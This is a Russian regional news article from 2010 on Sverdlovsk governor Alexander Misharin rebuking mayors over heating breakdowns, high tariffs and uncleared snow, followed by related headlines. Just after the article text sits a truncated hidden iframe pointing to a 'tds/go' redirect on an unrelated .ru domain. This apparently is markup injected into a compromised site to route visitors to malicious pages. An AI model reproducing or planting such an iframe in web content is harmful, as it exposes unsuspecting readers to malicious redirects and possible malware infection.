15.01.2010, 14:41

Свердловские мэры ответили за снег и холод в квартирах

Губернатор Свердловской области посредством видеосвязи обсудил сегодня с мэрами городов проблемы жилищно-коммунального хозяйства и уборки снега. Александр Мишарин пообещал, что отныне такие «встречи» будут проводиться еженедельно.

Губернатор припомнил муниципалитетам 511 аварийных ситуаций в сфере ЖКХ в праздничные дни, отметив, что наиболее серьезное число, 72%, приходится на Екатеринбург. «Новогодние праздники были подпорчены», — констатировал Александр Мишарин.

Недовольство губернатора вызвала и низкая температура в домах жителей муниципалитетов, особенно ситуация в Артемовском. Решив не брать на вооружение фактор неожиданности, Мишарин даже пообещал проехать по проблемным территориям с проверкой.

«Я бы порекомендовал муниципалитетам активно к этому готовиться», — сказал глава региона.

Глава Артемовского, однако, достаточно оптимистично смотрит на ситуацию. По его словам, доля жилья, где нарушен тепловой режим, составляет 0,01%. Ответным негативным эмоциям губернатора не было предела.

«Люди из Артемовского постоянно жалуются, что в квартирах холодно! Я пошлю отдельную комиссию, которая проведет проверку, и если это не так, то будем разбираться по-другому. Я вас за язык не тянул», — отрезал Александр Мишарин.

К недовольству привели и высокие тарифы в Артемовском.

«С 2010 года ваши тарифы — самые высокие по области из-за потерь в сетях. Перекладываете дурное хозяйство на жителей. Понятно, что таких денег у них нет. На 150—170% увеличить тариф большого ума не надо. Нужно правильно вести хозяйство», — добил Владимира Новикова губернатор.

Начальственного гнева не избежали и другие участники совещания.

Аркадий Чернецкий не стал скрывать своих обид на ТГК-9, обвинив энергетиков в том, что они не производят ремонт своих 400 км сетей, из-за чего в результате и произошла крупная праздничная авария на проспекте Космонавтов.

«Нам еще повезло, что она случилась именно на том участке, ведь если бы пробило соседний участок, то без отопления оказались бы сразу четыре района города», — порадовался мэр. Гендиректор ТГК Сергей Ефимов не мог не отстоять честь мундира.

«ЖКХ города имеет хроническую задолженность. А вообще, на уровне области необходимо активизировать работу по своевременному сбору платежей», — неосторожно попытался поставить энергетик задачу Александру Мишарину.

Однако губернатор остановил красноречивого Сергея Ефимова.

«А вы извинились перед жителями города? Выходить и давать задания не надо», — отрезал губернатор, не давая вставить слова и отказавшись слушать дальнейшие оправдания.

Проблема аварийности на дорогах из-за снега стала второй по важности на совещании. Губернатор обвинял глав в бездействии.

«Необходимо расчищать снег вовремя, в течение суток. Иначе это приводит к образованию колей, которые сложно убрать. Это лишние затраты сил и средств. Конечно, сейчас много работы, потому что надо было раньше этим заниматься. Я специально проехал по улице Ленина 5 января. Расчищено ничего не было. Кроме того, даже не расчищалось. Я не увидел ни одной единицы техники», — поделился увиденным губернатор.

«Создается впечатление, что мы начинаем работы по расчистке первый раз. Говорить о том, что городские службы сделали всё, — неправильно», — констатировал Мишарин, обращаясь уже к мэру Екатеринбурга.

Как оказалось, свой план у бывшего транспортника Мишарина уже есть.

«Нужно разработать порядок действий в сложных метеоусловиях. Если такой ситуации не было 20 лет, это не значит, что ее не будет через 15 дней или в будущем. Согласен, средств на технику не хватает, но в этом случае нужно расписать очередность выполнения работ, расчищать тротуары лопатами, как это делалось ранее. Выводили же танки на расчистку, когда в мае 1984 года выпало много снега», — вспомнил боевую молодость Александр Мишарин.

Судя по всему, придется вспомнить об опыте управления в ручном режиме и мэрам, ведь ничего хорошего в ближайшие дни синоптики ни им, ни нам не обещают.
<iframe src="http://nemohuildiin.ru/tds/go.

Похожие новости по теме
23.01.2014, 17:29

Снегу в Екатеринбурге назначили дедлайн

Екатеринбургские власти поставили крайние сроки, когда тротуары в городе должны быть очищены от снега. На расчистку пешеходных зон коммунальным службам отведена неделя. Проблема с уборкой снега...

29.11.2010, 16:08

Команда Александра Мишарина начала высказывать первые претензии Евгению Порунову и Александру Якобу

Как и ожидалось, отсутствие сильного избранного горожанами мэра вовсе не гарантирует Екатеринбургу процветания, скорее наоборот. На совместном заседании президиума правительства и Совета общественной...

24.08.2010, 07:24

Александр Мишарин воспринял упреки Владимира Путина на свой счет

Свердловский губернатор Александр Мишарин поделился с коллегами по президиуму областного правительства своими переживаниями по поводу критики Владимиром Путиным регионов-транжир. Как оказалось,...

Александр Мишарин посетил города Восточного управленческого округа 29.01.2010, 09:54

Александр Мишарин посетил города Восточного управленческого округа

28 января. Губернатор Александр Мишарин находился в рабочей поездке по Восточному управленческому округу. Поездка началась с самого проблемного города этой территории – Артемовского. Губернатор...

15.01.2010, 14:43

Свердловские мэры ответили за снег и холод в квартирах

Губернатор Свердловской области посредством видеосвязи обсудил сегодня с мэрами городов проблемы жилищно-коммунального хозяйства и уборки снега. Александр Мишарин пообещал, что отныне такие...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам